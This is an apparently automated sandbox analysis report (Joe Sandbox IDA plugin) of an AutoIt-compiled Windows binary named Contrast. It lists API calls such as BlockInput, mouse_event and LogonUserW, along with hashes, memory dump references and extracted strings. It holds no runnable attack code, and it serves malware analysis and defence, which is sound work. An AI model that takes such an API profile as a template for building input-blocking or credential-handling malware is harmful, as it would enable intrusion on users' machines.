                                                                                                                                        • Opcode Fuzzy Hash: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                                                                                                                                        • Instruction Fuzzy Hash: B2B09231074208ABCE402B91EC19B883F68EB56BA2F005412F60D440A0CBA25454AA91
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 005845F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        • Opcode ID: 5d04e9533fc0d975a234a95a60c5c915f568694aa8481e12b05fa99bda6ab492
                                                                                                                                        • Instruction ID: e93a91ffe2d9c91be8f1ea8bec6691a13d7b1221d3569b896ccdabc7471c7f18
                                                                                                                                        • Opcode Fuzzy Hash: 5d04e9533fc0d975a234a95a60c5c915f568694aa8481e12b05fa99bda6ab492
                                                                                                                                        • Instruction Fuzzy Hash: CCE04F752106169FD710BF99E808A9AFBE8BF99760F00841AFC49D7351EA70F9418FA1
                                                                                                                                        APIs
                                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00575205
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: mouse_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2434400541-0
                                                                                                                                        • Opcode ID: ae62e0d41aeda2f7e6563820afb2a803f2afc89317c06bd6bed36606ce021389
                                                                                                                                        • Instruction ID: a0a5e9552a46d29981918b1818da970c818451f8460cb2970599ad76a0ae908b
                                                                                                                                        • Opcode Fuzzy Hash: ae62e0d41aeda2f7e6563820afb2a803f2afc89317c06bd6bed36606ce021389
                                                                                                                                        • Instruction Fuzzy Hash: EED06CE5262A0A69ED984724AA1FF761A08B3457C2FD4DA49718A890C2B8D46886F921
                                                                                                                                        APIs
                                                                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568FA7), ref: 00569389
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LogonUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1244722697-0
                                                                                                                                        • Opcode ID: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                                                                                                                                        • Instruction ID: 1e383b6dd9f94d3105d9021ff0fb5bba74ed22417ea444535737a5da9b24b108
                                                                                                                                        • Opcode Fuzzy Hash: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                                                                                                                                        • Instruction Fuzzy Hash: 10D05E322A050EABEF018EA4DC05EAE3B69EB04B01F808111FE15C50A0C775E835AB60
                                                                                                                                        APIs
                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00550734
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        • Opcode ID: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                                                                                                                                        • Instruction ID: 73cd55c616412ab27854aa287d3b0cbcf45fd15a54a1449169ff81de96cdaf03
                                                                                                                                        • Opcode Fuzzy Hash: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                                                                                                                                        • Instruction Fuzzy Hash: D3C04CF181010DDBCB05DBA0DA9CEFE7BBCBB04305F501456A505B2190D7749B489A71
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A35A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                                                                                                                                        • Instruction ID: 9586ae2843f6e5dcfa8b43e780edaa2ffe0491223b175c712bc3c9715dc840b5
                                                                                                                                        • Opcode Fuzzy Hash: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                                                                                                                                        • Instruction Fuzzy Hash: BFA0223003020CFBCF002F82FC08888BFACEB023E0B008022F80C00032CB33A820AAC0
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,005A0980), ref: 00593C65
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00593C89
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                        • API String ID: 4105515805-45149045
                                                                                                                                        • Opcode ID: 74acf3e972ecff99f095df3e20d206a05ae21a2fd950513987cc981b507ba1ab
                                                                                                                                        • Instruction ID: bfb4b0f952da757f2b2247181eef9fde6ad85814305c0aa814cef001da8c4843
                                                                                                                                        • Opcode Fuzzy Hash: 74acf3e972ecff99f095df3e20d206a05ae21a2fd950513987cc981b507ba1ab
                                                                                                                                        • Instruction Fuzzy Hash: F2D12930204206DBCF14EF50C469EAABFE5BF95354F144858F8865B2E2DB35EE4ACB81
                                                                                                                                        APIs
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0059AC55
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0059AC86
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0059AC92
                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0059ACAC
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0059ACBB
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0059ACE6
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 0059ACEE
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0059ACF5
                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 0059AD04
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0059AD0B
                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0059AD56
                                                                                                                                        • FillRect.USER32(?,?,?), ref: 0059AD88
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0059ADB3
                                                                                                                                          • Part of subcall function 0059AF18: GetSysColor.USER32(00000012), ref: 0059AF51
                                                                                                                                          • Part of subcall function 0059AF18: SetTextColor.GDI32(?,?), ref: 0059AF55
                                                                                                                                          • Part of subcall function 0059AF18: GetSysColorBrush.USER32(0000000F), ref: 0059AF6B
                                                                                                                                          • Part of subcall function 0059AF18: GetSysColor.USER32(0000000F), ref: 0059AF76
                                                                                                                                          • Part of subcall function 0059AF18: GetSysColor.USER32(00000011), ref: 0059AF93
                                                                                                                                          • Part of subcall function 0059AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AFA1
                                                                                                                                          • Part of subcall function 0059AF18: SelectObject.GDI32(?,00000000), ref: 0059AFB2
                                                                                                                                          • Part of subcall function 0059AF18: SetBkColor.GDI32(?,00000000), ref: 0059AFBB
                                                                                                                                          • Part of subcall function 0059AF18: SelectObject.GDI32(?,?), ref: 0059AFC8
                                                                                                                                          • Part of subcall function 0059AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0059AFE7
                                                                                                                                          • Part of subcall function 0059AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AFFE
                                                                                                                                          • Part of subcall function 0059AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0059B013
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                        • Opcode ID: a14cf9cc7c70f1c7026eeeffa21c247ef3e6d1ef66c3e9a2e4e0833ff8fa4ee9
                                                                                                                                        • Instruction ID: a2b08abd7d0e6d5d96dd97d072b7f13b10112d7e657ba5a224e69a167d9b3d66
                                                                                                                                        • Opcode Fuzzy Hash: a14cf9cc7c70f1c7026eeeffa21c247ef3e6d1ef66c3e9a2e4e0833ff8fa4ee9
                                                                                                                                        • Instruction Fuzzy Hash: 51A19F72418301BFDB519F64DC08E6B7BA9FF8A321F101A19F962961E0D731D948DFA2
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00513072
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005130B8
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005130C3
                                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 005130CE
                                                                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 005130D9
                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C77C
                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C7B5
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054CBDE
                                                                                                                                          • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 0054CC1B
                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054CC32
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CC48
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CC53
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 464785882-4108050209
                                                                                                                                        • Opcode ID: d6dbe13792871ee09f31a6187d7048f356f3b274a78170ecfa7d28f64c1957a0
                                                                                                                                        • Instruction ID: 0215c2bee2f43482d3f9bf31e2d9581bfeca6cdd6c742155367306483ed38faf
                                                                                                                                        • Opcode Fuzzy Hash: d6dbe13792871ee09f31a6187d7048f356f3b274a78170ecfa7d28f64c1957a0
                                                                                                                                        • Instruction Fuzzy Hash: C8129A30601201EFDB64DF24C898BE9BFE1FB89318F144569E995CB2A2C731ED85DB91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                        • API String ID: 2660009612-1645009161
                                                                                                                                        • Opcode ID: dcb1ee11740c95c5487cec2af2470b098942cb4e5a86cb0a59ab4bbb87e4cf83
                                                                                                                                        • Instruction ID: 030251d3219023642fee6cdaa106f999d7bfdc3318cbdd74a371061c36a0e88a
                                                                                                                                        • Opcode Fuzzy Hash: dcb1ee11740c95c5487cec2af2470b098942cb4e5a86cb0a59ab4bbb87e4cf83
                                                                                                                                        • Instruction Fuzzy Hash: 4AA18F35A0021ABBCB14AF61E856EAE7F78BF86740F000029FD05AB2D2DB71DE55D750
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00587BC8
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00587C87
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00587CC5
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00587CD7
                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587D1D
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00587D29
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587D6D
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587D7C
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00587D8C
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00587D90
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00587DA0
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00587DA9
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00587DB2
                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00587DDE
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00587DF5
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587E30
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00587E44
                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00587E55
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00587E85
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00587E90
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00587E9B
                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00587EA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        • Opcode ID: 4e819818d921b8d9a1fcf4c201f6a3f5f6f93da8ca50bdfe1bcfcdb35b136e09
                                                                                                                                        • Instruction ID: 7770c9b27471b1188dfe3c0c0c9c742ac0042ac1a6f85059d4ac2ccd982d6f79
                                                                                                                                        • Opcode Fuzzy Hash: 4e819818d921b8d9a1fcf4c201f6a3f5f6f93da8ca50bdfe1bcfcdb35b136e09
                                                                                                                                        • Instruction Fuzzy Hash: A6A19FB1A50619BFEB14DBA4DC4AFAF7BA9FB59310F004115FA14A72E0D770AD04DB60
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0057B361
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,005A2C4C,?,\\.\,005A0980), ref: 0057B43E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,005A2C4C,?,\\.\,005A0980), ref: 0057B59C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                        • Opcode ID: c99703a6d97562b83f896ca99483b4819bcefcb8cd565463b134610303314fce
                                                                                                                                        • Instruction ID: bf6087ffc7f748a6b3f9d4b007134b98ad5e434a051e75195b87d72399b0f1a3
                                                                                                                                        • Opcode Fuzzy Hash: c99703a6d97562b83f896ca99483b4819bcefcb8cd565463b134610303314fce
                                                                                                                                        • Instruction Fuzzy Hash: F5516730B40209DFAB00DB60ED86F6D7FE1FB95740B24C519F40AA7291E771AE81EB55
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0059A0F7
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0059A1B0
                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0059A1CC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                        • Opcode ID: 45e13a12f91ce3cf563aa57b191adf41784970e0a5d4c81a3c4b53e4c60dcb46
                                                                                                                                        • Instruction ID: 48301a6a864308c7a98a0d8d8eb86e24e3aad53a6c477d7f6c08ef129c266200
                                                                                                                                        • Opcode Fuzzy Hash: 45e13a12f91ce3cf563aa57b191adf41784970e0a5d4c81a3c4b53e4c60dcb46
                                                                                                                                        • Instruction Fuzzy Hash: D902D030208301AFEF25CF14C848BAABFE4FF99314F04891DF999962A1D775D954DBA2
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 0059AF51
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0059AF55
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0059AF6B
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0059AF76
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 0059AF7B
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 0059AF93
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AFA1
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0059AFB2
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0059AFBB
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0059AFC8
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AFE7
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AFFE
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0059B013
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059B05F
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059B086
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0059B0A4
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 0059B0AF
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 0059B0BD
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0059B0C5
                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059B0D9
                                                                                                                                        • SelectObject.GDI32(?,0059AC1F), ref: 0059B0F0
